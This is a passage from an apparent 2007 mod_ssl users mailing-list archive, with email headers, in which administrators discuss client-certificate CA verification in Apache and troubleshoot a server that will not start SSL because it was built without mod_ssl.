> these goals?
> 
> 
> 
> CONFIGURATION:
> Here's my SSL conf file.  It's loaded from httpd.conf:
> 
> 
>     DocumentRoot [SNIP]
>     ServerName [SNIP]:443
>     ServerAdmin [SNIP]
>     CustomLog virtualhosts/secure/logs/access.log common
>     ErrorLog virtualhosts/secure/logs/error.log
>     TransferLog virtualhosts/secure/logs/access.log
>     LogLevel debug
> 
>     
>         SSLEngine on
>         SSLCipherSuite
> ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
>         SSLCertificateFile conf/ssl/[SNIP].crt
>         SSLCertificateKeyFile conf/ssl/[SNIP].key
>         SSLCACertificateFile conf/ssl/certchain.cer
>         SSLVerifyDepth  10
>         
>             SSLOptions +StdEnvVars
>         
>         
>             SSLOptions +StdEnvVars
>         
>         SetEnvIf User-Agent ".*MSIE.*" \
>                  nokeepalive ssl-unclean-shutdown \
>                  downgrade-1.0 force-response-1.0
>         CustomLog virtualhosts/secure/logs/ssl_request_log \
>                   "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
> 
>         # Prevent clients from using SSLv3
>         SSLProtocol all -SSLv3
>     
> 
>     DocumentRoot [SNIP]/virtualhosts/secure/htdocs
>     
>         Options Indexes FollowSymLinks
>         AllowOverride None
>         Order allow,deny
>         Allow from all
>     
> 
>     
>         Options FollowSymLinks
>         AllowOverride None
> 
>         Order allow,deny
>         Allow from all
>     
> 
>     
>         # Per-directory configuration for SSL
>         SSLRequireSSL
>         SSLRequire %{SSL_CIPHER_USEKEYSIZE} >= 128
>         SSLVerifyClient require
>     
> 
>     
>         AllowOverride None
>         Options None
>         Order allow,deny
>         Allow from all
>     
> 
> 
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 24 22:07:59 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 71F3814D88C; Tue, 24 Apr 2007 22:07:59 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.dudelab.org (dudelab.org [212.12.33.202])
	by master.modssl.org (Postfix) with ESMTP id C3BCD14D87F
	for ; Tue, 24 Apr 2007 22:07:58 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by mail.dudelab.org (Postfix) with ESMTP id 399CA4B74A
	for ; Tue, 24 Apr 2007 22:07:36 +0200 (CEST)
Received: from mail.dudelab.org ([127.0.0.1])
 by localhost (dudelab [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
 id 05187-07 for ;
 Tue, 24 Apr 2007 22:07:35 +0200 (CEST)
Received: from [192.168.178.20] (p548EB8E5.dip0.t-ipconnect.de [84.142.184.229])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(Client CN "Olaf Gellert", Issuer "User CA" (verified OK))
	by mail.dudelab.org (Postfix) with ESMTP id 55A774B695
	for ; Tue, 24 Apr 2007 22:07:35 +0200 (CEST)
Message-ID: <462E650E.2060805@intrusion-lab.net>
Date: Tue, 24 Apr 2007 22:14:06 +0200
From: Olaf Gellert 
User-Agent: Thunderbird 1.5.0.10 (X11/20060911)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: SOLVED: Am I using SSLCACertificateFile as intended?
References: <4251.76.214.147.64.1177390292.squirrel@webmail.sep.com> 
In-Reply-To: 
X-Enigmail-Version: 0.94.1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: amavisd-new at dudelab.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Olaf Gellert 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

David P. Mott wrote:
> 
> I don't know why I didn't find this in the dozens of Google searches
> that I did *before* I posted my question, but these seem to be what I'm
> looking for:
> 
> SSLCADNRequestFile / SSLCADNRequestPath

Please be aware that Apache/ModSSL uses den SSLCADNRequest-
File / SSLCADNRequestPath only for submitting a list of
accepted CAs to the client. It does not use this for
verification. So: Usually a client will send the certificate
of the requested subCA (even if he has client certificates
from both CAs), but this does not mean that a malicious
client could not send a client certificate of the other
CA. This certificate would be accepted then (because
evaluation of the chain is still done against the certificates
from SSLCACertificateFile. There is no check against the
certificates from SSLCADNRequestFile...

Regards, Olaf

-- 

Dipl.Inform. Olaf Gellert                   INTRUSION-LAB.NET
Senior Researcher,                      www.intrusion-lab.net
PKI - and IDS - Services        olaf.gellert@intrusion-lab.net

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 24 22:31:17 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D141914D886; Tue, 24 Apr 2007 22:31:17 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.sep.com (IP-216-37-52-133.nframe.net [216.37.52.133])
	by master.modssl.org (Postfix) with ESMTP id 2F09014D841
	for ; Tue, 24 Apr 2007 22:31:16 +0200 (CEST)
Received: from olorin.net.sep.com (olorin.sep.com [172.16.0.114])
	by mail.sep.com (Postfix) with ESMTP id C3F7A423F
	for ; Tue, 24 Apr 2007 16:30:34 -0400 (EDT)
Date: Tue, 24 Apr 2007 16:30:34 -0400 (Eastern Daylight Time)
From: "David P. Mott" 
To: modssl-users@modssl.org
Subject: Re: SOLVED: Am I using SSLCACertificateFile as intended?
In-Reply-To: <462E650E.2060805@intrusion-lab.net>
Message-ID: 
References: <4251.76.214.147.64.1177390292.squirrel@webmail.sep.com>
  <462E650E.2060805@intrusion-lab.net>
X-X-Sender: dpmott@gothmog.sep.com
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David P. Mott" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Oh, good call!

So, now I'm looking at:

* SSLCACertificateFile, to hold all of the certificates that I would 
authenticate against;
* SSLCADNRequestFile, to send an acceptable list of certificates to the 
client;
* SSLRequire, to prevent malicious clients from sending me a certificate 
that would validate against a CA higher up the chain than what I want.

I'd probably have researched the SSLRequire part of it anway; all of our 
production Apache servers are 2.0.x, which don't support the 
SSLCADNRequestFile directive.  Until they can be upgraded, I'll want to 
prevent the use of an inappropriate certificate.

Thanks for taking the time to respond to this issue.

-dpmott

On Tue, 24 Apr 2007, Olaf Gellert wrote:

> David P. Mott wrote:
>>
>> I don't know why I didn't find this in the dozens of Google searches
>> that I did *before* I posted my question, but these seem to be what I'm
>> looking for:
>>
>> SSLCADNRequestFile / SSLCADNRequestPath
>
> Please be aware that Apache/ModSSL uses den SSLCADNRequest-
> File / SSLCADNRequestPath only for submitting a list of
> accepted CAs to the client. It does not use this for
> verification. So: Usually a client will send the certificate
> of the requested subCA (even if he has client certificates
> from both CAs), but this does not mean that a malicious
> client could not send a client certificate of the other
> CA. This certificate would be accepted then (because
> evaluation of the chain is still done against the certificates
> from SSLCACertificateFile. There is no check against the
> certificates from SSLCADNRequestFile...
>
> Regards, Olaf
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 27 16:50:13 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 16BB114D8AF; Fri, 27 Apr 2007 16:50:13 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nz-out-0506.google.com (nz-out-0506.google.com [64.233.162.235])
	by master.modssl.org (Postfix) with ESMTP id 1260614D82C
	for ; Fri, 27 Apr 2007 16:50:09 +0200 (CEST)
Received: by nz-out-0506.google.com with SMTP id o37so1366218nzf
        for ; Fri, 27 Apr 2007 07:49:28 -0700 (PDT)
DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed;
        d=gmail.com; s=beta;
        h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=cQR2xSpzCVqEjSKxAoX+CQe0lTShsT+mEfkPiCCijyNc6t9zMPyDvjgDFeistsFKoGev3ISFbmYfofsLC5/ZyKiDmw5d/t9rEtSOaoi15kyZ2nCKAxaSenhTEhtCK+wjzibdLw0nyojZazsx4F+milVIjmgGYD8cWvtgVbIZ+1o=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=beta;
        h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=e4+wGh0HSN7gMaWN59Fiob5EAZF0d1N4ozfvN8O1ZgY3pgLnf/JsBoc+0WckkWcXbG/4lwCLDtIr4G4ixjSclA2eCLOvLSR0AN0nAePCrV9b5eVgQjgC1mezpwZJSsUiEZ2/4PIe7Yz+VeZUfz9R+aRR5JhIoubqayoIEhfeNo4=
Received: by 10.114.159.1 with SMTP id h1mr1013183wae.1177685367573;
        Fri, 27 Apr 2007 07:49:27 -0700 (PDT)
Received: by 10.115.94.18 with HTTP; Fri, 27 Apr 2007 07:49:27 -0700 (PDT)
Message-ID: <773acc7b0704270749i35a47871q73751129aedf2dd9@mail.gmail.com>
Date: Fri, 27 Apr 2007 10:49:27 -0400
From: "javier rojas" 
To: modssl-users@modssl.org
Subject: cant start ssl on apache2
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "javier rojas" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

im having some trouble when starting ssl on my apache2 server, first i
must say that i did not install apache, so i really dont know if ssl
was enabled, but i guess so since in the httpd.conf i have


    Include conf/ssl.conf


well, the second thing is that i have configured everything in my
ssl.conf file (i think it is ok) but when i restart apache it doesnt
even "read" the ssl.conf file, i renamed the ssl.conf file to
ssl.conf.1 and apache restarted successfully, so i think it just
doesnt look for it when restarting.

i did comment the


in ssl.conf, in order to be able to start apache always with ssl support

im pretty sure my ssl.conf and my httpd.conf files are correctly since
i have another server with the same configurations and its working
properly, but when i

netstat -nl | grep 443

theres nothing listening and on the /usr/local/apache/logs/ directory theres no
ssl_request_log/  ssl_scache.dir  ssl_scache.pag
log files, can anyone help me?

-- 
Ciao, Javier
linux counter #393724
GPG Key Fingerprint = 46B76CFEDB0161089D9ECB22FEFDE7EBA8C2007E
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 27 17:19:58 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1487414D8AF; Fri, 27 Apr 2007 17:19:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from acrux.ligo.caltech.edu (acrux.ligo.caltech.edu [131.215.115.14])
	by master.modssl.org (Postfix) with ESMTP id B256214D82C
	for ; Fri, 27 Apr 2007 17:19:55 +0200 (CEST)
Received: from tarazed.ligo.caltech.edu (tarazed [131.215.115.31])
	by acrux.ligo.caltech.edu (8.12.11/8.12.11) with ESMTP id l3RFJC8N003946
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT)
	for ; Fri, 27 Apr 2007 08:19:12 -0700 (PDT)
Received: from tarazed.ligo.caltech.edu (localhost.localdomain [127.0.0.1])
	by tarazed.ligo.caltech.edu (8.13.7/8.13.4) with ESMTP id l3RFJ77L006397
	for ; Fri, 27 Apr 2007 08:19:07 -0700
Received: (from pehrens@localhost)
	by tarazed.ligo.caltech.edu (8.13.7/8.13.4/Submit) id l3RFJ75c006396
	for modssl-users@modssl.org; Fri, 27 Apr 2007 08:19:07 -0700
Date: Fri, 27 Apr 2007 08:19:06 -0700
From: Phil Ehrens 
To: modssl-users@modssl.org
Subject: Re: cant start ssl on apache2
Message-ID: <20070427151905.GB28391@ligo.caltech.edu>
References: <773acc7b0704270749i35a47871q73751129aedf2dd9@mail.gmail.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <773acc7b0704270749i35a47871q73751129aedf2dd9@mail.gmail.com>
Shoe-Size: 9-1/2
User-Agent: Mutt/1.5.12-2006-07-14
X-Spam-Score: undef - Domain Whitelisted (ligo.caltech.edu: )
X-Canit-Stats-ID: 6550230 - b8e577f7f912
X-Scanned-By: CanIt (www . roaringpenguin . com) on 131.215.115.14
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Phil Ehrens 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Are you calling apachectl using the full path to the apachectl
that knows where THOSE conf files are?

Sorry for top-posting... It just seemed like the right thing to do
in this case.

javier rojas wrote:
> Hello,
> 
> im having some trouble when starting ssl on my apache2 server, first i
> must say that i did not install apache, so i really dont know if ssl
> was enabled, but i guess so since in the httpd.conf i have
> 
> 
>    Include conf/ssl.conf
> 
> 
> well, the second thing is that i have configured everything in my
> ssl.conf file (i think it is ok) but when i restart apache it doesnt
> even "read" the ssl.conf file, i renamed the ssl.conf file to
> ssl.conf.1 and apache restarted successfully, so i think it just
> doesnt look for it when restarting.
> 
> i did comment the
> 
> 
> in ssl.conf, in order to be able to start apache always with ssl support
> 
> im pretty sure my ssl.conf and my httpd.conf files are correctly since
> i have another server with the same configurations and its working
> properly, but when i
> 
> netstat -nl | grep 443
> 
> theres nothing listening and on the /usr/local/apache/logs/ directory 
> theres no
> ssl_request_log/  ssl_scache.dir  ssl_scache.pag
> log files, can anyone help me?
> 
> -- 
> Ciao, Javier
> linux counter #393724
> GPG Key Fingerprint = 46B76CFEDB0161089D9ECB22FEFDE7EBA8C2007E
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
Phil Ehrens | Fun stuff:
The LIGO Laboratory, MS 18-34         | http://www.ralphmag.org
California Institute of Technology    | http://www.trenchman.com
1200 East California Blvd.            | http://www.tokyotosho.com
Pasadena, CA 91125 USA                | My gpg public key:
Phone:(626)395-8518 Fax:(626)793-9744 | http://www.imbe.net/peligo.asc
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 27 17:31:40 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6BBDD14D8AF; Fri, 27 Apr 2007 17:31:40 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nz-out-0506.google.com (nz-out-0506.google.com [64.233.162.239])
	by master.modssl.org (Postfix) with ESMTP id 4BB7214D82C
	for ; Fri, 27 Apr 2007 17:31:37 +0200 (CEST)
Received: by nz-out-0506.google.com with SMTP id o37so1382570nzf
        for ; Fri, 27 Apr 2007 08:30:55 -0700 (PDT)
DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed;
        d=gmail.com; s=beta;
        h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=RDij263+o6M8mOaRG9P1vTh7kgnfCrlqMJPegtJBuSWx5JWntRI8D/Am2XZ4Pyi0JQNSs7SvWVLDZvuj44cf/k0miGoapreN9mAFH74+JQY4ODGm9qUdfXVAw19rZF38pSyuHVYiAeepre4jJ4iHTQT3sUiINfzE+KjmgXtLtSc=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=beta;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=A7isZOyglNcn32wdMgkjisvZWCf0F7rmDFP0uUrEJ5kX5bxZBXBF1mtzwHasDH5FRlYP3teIJ2lVK4KWnMYlRJwHWLudkg7elFo5oTreVI3Bmz3XmsGc35QRsnLi+jVkcsPdeEqfNh7tFgRgHA0y5tjvTMaXXESIjQqH+pdTwIY=
Received: by 10.114.124.1 with SMTP id w1mr1028742wac.1177687854781;
        Fri, 27 Apr 2007 08:30:54 -0700 (PDT)
Received: by 10.115.94.18 with HTTP; Fri, 27 Apr 2007 08:30:54 -0700 (PDT)
Message-ID: <773acc7b0704270830h1104e639x9df0448de5dbacfe@mail.gmail.com>
Date: Fri, 27 Apr 2007 11:30:54 -0400
From: "javier rojas" 
To: modssl-users@modssl.org
Subject: Re: cant start ssl on apache2
In-Reply-To: <20070427151905.GB28391@ligo.caltech.edu>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
References: <773acc7b0704270749i35a47871q73751129aedf2dd9@mail.gmail.com>
	 <20070427151905.GB28391@ligo.caltech.edu>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "javier rojas" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

2007/4/27, Phil Ehrens :
> Are you calling apachectl using the full path to the apachectl
> that knows where THOSE conf files are?
>
> Sorry for top-posting... It just seemed like the right thing to do
> in this case.
hello :)

well im using the only apachectl in my machine, thats in
/usr/local/apache2/bin

and i comment the line
Listen 80

and then
/usr/local/apache2/bin/apachectl restart

to see if apachectl was reading the correct httpd.conf and it didn't
start the server....
-- 
Ciao, Javier
linux counter #393724
GPG Key Fingerprint = 46B76CFEDB0161089D9ECB22FEFDE7EBA8C2007E
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 27 17:48:33 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C182814D8AF; Fri, 27 Apr 2007 17:48:33 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from acrux.ligo.caltech.edu (acrux.ligo.caltech.edu [131.215.115.14])
	by master.modssl.org (Postfix) with ESMTP id 0CC8314D82C
	for ; Fri, 27 Apr 2007 17:48:32 +0200 (CEST)
Received: from tarazed.ligo.caltech.edu (tarazed [131.215.115.31])
	by acrux.ligo.caltech.edu (8.12.11/8.12.11) with ESMTP id l3RFloo6004933
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT)
	for ; Fri, 27 Apr 2007 08:47:50 -0700 (PDT)
Received: from tarazed.ligo.caltech.edu (localhost.localdomain [127.0.0.1])
	by tarazed.ligo.caltech.edu (8.13.7/8.13.4) with ESMTP id l3RFljsE006696
	for ; Fri, 27 Apr 2007 08:47:45 -0700
Received: (from pehrens@localhost)
	by tarazed.ligo.caltech.edu (8.13.7/8.13.4/Submit) id l3RFlica006695
	for modssl-users@modssl.org; Fri, 27 Apr 2007 08:47:44 -0700
Date: Fri, 27 Apr 2007 08:47:44 -0700
From: Phil Ehrens 
To: modssl-users@modssl.org
Subject: Re: cant start ssl on apache2
Message-ID: <20070427154744.GA6439@ligo.caltech.edu>
References: <773acc7b0704270749i35a47871q73751129aedf2dd9@mail.gmail.com> <20070427151905.GB28391@ligo.caltech.edu> <773acc7b0704270830h1104e639x9df0448de5dbacfe@mail.gmail.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <773acc7b0704270830h1104e639x9df0448de5dbacfe@mail.gmail.com>
Shoe-Size: 9-1/2
User-Agent: Mutt/1.5.12-2006-07-14
X-Spam-Score: undef - Domain Whitelisted (ligo.caltech.edu: )
X-Canit-Stats-ID: 6550517 - 2b9249307cfc
X-Scanned-By: CanIt (www . roaringpenguin . com) on 131.215.115.14
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Phil Ehrens 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

javier rojas wrote:
> 2007/4/27, Phil Ehrens :
> >Are you calling apachectl using the full path to the apachectl
> >that knows where THOSE conf files are?
> >
> >Sorry for top-posting... It just seemed like the right thing to do
> >in this case.
> hello :)
> 
> well im using the only apachectl in my machine, thats in
> /usr/local/apache2/bin
> 
> and i comment the line
> Listen 80
> 
> and then
> /usr/local/apache2/bin/apachectl restart
> 
> to see if apachectl was reading the correct httpd.conf and it didn't
> start the server....

And when you run

 /usr/local/apache2/bin/httpd -V

Does everything look okay?

Phil
-- 
Phil Ehrens | Fun stuff:
The LIGO Laboratory, MS 18-34         | http://www.ralphmag.org
California Institute of Technology    | http://www.trenchman.com
1200 East California Blvd.            | http://www.tokyotosho.com
Pasadena, CA 91125 USA                | My gpg public key:
Phone:(626)395-8518 Fax:(626)793-9744 | http://www.imbe.net/peligo.asc
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 27 17:52:33 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C3ADB14D8AF; Fri, 27 Apr 2007 17:52:33 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.sep.com (IP-216-37-52-133.nframe.net [216.37.52.133])
	by master.modssl.org (Postfix) with ESMTP id 9B8E014D82C
	for ; Fri, 27 Apr 2007 17:52:32 +0200 (CEST)
Received: from olorin.net.sep.com (olorin.sep.com [172.16.0.114])
	by mail.sep.com (Postfix) with ESMTP id B1E274199
	for ; Fri, 27 Apr 2007 11:51:49 -0400 (EDT)
Date: Fri, 27 Apr 2007 11:51:45 -0400 (Eastern Daylight Time)
From: "David P. Mott" 
To: modssl-users@modssl.org
Subject: Re: cant start ssl on apache2
In-Reply-To: <773acc7b0704270830h1104e639x9df0448de5dbacfe@mail.gmail.com>
Message-ID: 
References: <773acc7b0704270749i35a47871q73751129aedf2dd9@mail.gmail.com> 
 <20070427151905.GB28391@ligo.caltech.edu> <773acc7b0704270830h1104e639x9df0448de5dbacfe@mail.gmail.com>
X-X-Sender: dpmott@gothmog.sep.com
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David P. Mott" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, 27 Apr 2007, javier rojas wrote:

> 2007/4/27, Phil Ehrens :
>> Are you calling apachectl using the full path to the apachectl
>> that knows where THOSE conf files are?
>> 
>
> /usr/local/apache2/bin/apachectl restart
>
> to see if apachectl was reading the correct httpd.conf and it didn't
> start the server....

I don't know if this will help... I have an installation on linux (2.4.18) 
wherein apache is installed in /usr/local/apachessl2/, and if I issue the 
'apachectl restart' command it will *not* start SSL.

Instead, I must execute 'apachectl startssl'.

You can see if you have this situation: just examine the apachessl script 
(using less, vi, or your favorite editor) and search for 'startssl'.  In 
my script, it looks like it just boils down to a '-DSSL' being passed to 
the invocation of httpd.

You may also want to invoke the httpd executable by-hand to see if it 
issues anything on STDERR, and also check the error logfile that you have 
specified in your .conf file.  If Apache is getting that far, it will 
almost certainly give you some good feedback.

Finally (or perhaps first), you may want to invoke 'apachectl -t' to have 
it check your config file for syntax errors.  It will not only tell you if 
you've mistyped something, but in some cases it'll tell you that you've 
left something out or specified conflicting configuration options.

-dpmott
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 27 17:55:05 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6018414D9DB; Fri, 27 Apr 2007 17:55:05 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nz-out-0506.google.com (nz-out-0506.google.com [64.233.162.231])
	by master.modssl.org (Postfix) with ESMTP id E462E14D8B3
	for ; Fri, 27 Apr 2007 17:55:04 +0200 (CEST)
Received: by nz-out-0506.google.com with SMTP id o37so1391999nzf
        for ; Fri, 27 Apr 2007 08:54:23 -0700 (PDT)
DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed;
        d=gmail.com; s=beta;
        h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=QlYxEhcbA2k4XtRHKvpyYuscweZUCIJIX/McTuMKFo1k3FBDLwMegJoyOXEembKlRC4DeevRbp7PF2OBUjRbQl8WTBSfA5MMyn6PIMOMnaJbRhJvL4H29QD1OJ5n3e6IUMlHKXG0STV3Gv4zvJ7NLApbSy6Ao8cOhv7j03ZRdXE=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=beta;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=pS29Xej8ol/GRqGDQIlM/HRQIsigproz6BMzFii6MTeCiLYMEQJuCm/e6K7BC+1ARYF5Fg187CkiaQ5u89ThxJxVf+k5cdbFfxsyIeDxPgeSPCNcSLVpRUAlFRwTAWsuJ8JFDQASOaMGMRCFCFij540pMB/glZsbBp9vF1nvthk=
Received: by 10.114.176.1 with SMTP id y1mr1038438wae.1177689262724;
        Fri, 27 Apr 2007 08:54:22 -0700 (PDT)
Received: by 10.115.94.18 with HTTP; Fri, 27 Apr 2007 08:54:22 -0700 (PDT)
Message-ID: <773acc7b0704270854p461a0830g270f0057df3ae4f4@mail.gmail.com>
Date: Fri, 27 Apr 2007 11:54:22 -0400
From: "javier rojas" 
To: modssl-users@modssl.org
Subject: Re: cant start ssl on apache2
In-Reply-To: <20070427154744.GA6439@ligo.caltech.edu>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
References: <773acc7b0704270749i35a47871q73751129aedf2dd9@mail.gmail.com>
	 <20070427151905.GB28391@ligo.caltech.edu>
	 <773acc7b0704270830h1104e639x9df0448de5dbacfe@mail.gmail.com>
	 <20070427154744.GA6439@ligo.caltech.edu>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "javier rojas" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> And when you run
>
>  /usr/local/apache2/bin/httpd -V
>
> Does everything look okay?

mmmmm, this is what i was looking for.....

/usr/local/apache2/bin/httpd -V
Server version: Apache/2.0.49
Server built:   Apr 23 2007 10:41:23
Server's Module Magic Number: 20020903:7
Architecture:   64-bit
Server compiled with....
 -D APACHE_MPM_DIR="server/mpm/prefork"
 -D APR_HAS_SENDFILE
 -D APR_HAS_MMAP
 -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
 -D APR_USE_PROC_PTHREAD_SERIALIZE
 -D APR_USE_PTHREAD_SERIALIZE
 -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
 -D APR_HAS_OTHER_CHILD
 -D AP_HAVE_RELIABLE_PIPED_LOGS
 -D HTTPD_ROOT="/usr/local/apache2"
 -D SUEXEC_BIN="/usr/local/apache2/bin/suexec"
 -D DEFAULT_PIDLOG="logs/httpd.pid"
 -D DEFAULT_SCOREBOARD="logs/apache_runtime_status"
 -D DEFAULT_LOCKFILE="logs/accept.lock"
 -D DEFAULT_ERRORLOG="logs/error_log"
 -D AP_TYPES_CONFIG_FILE="conf/mime.types"
 -D SERVER_CONFIG_FILE="conf/httpd.conf"

i think it was not compiled with ssl support....:(

-- 
Ciao, Javier
linux counter #393724
GPG Key Fingerprint = 46B76CFEDB0161089D9ECB22FEFDE7EBA8C2007E
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 27 17:58:40 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 06E3514D88F; Fri, 27 Apr 2007 17:58:40 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
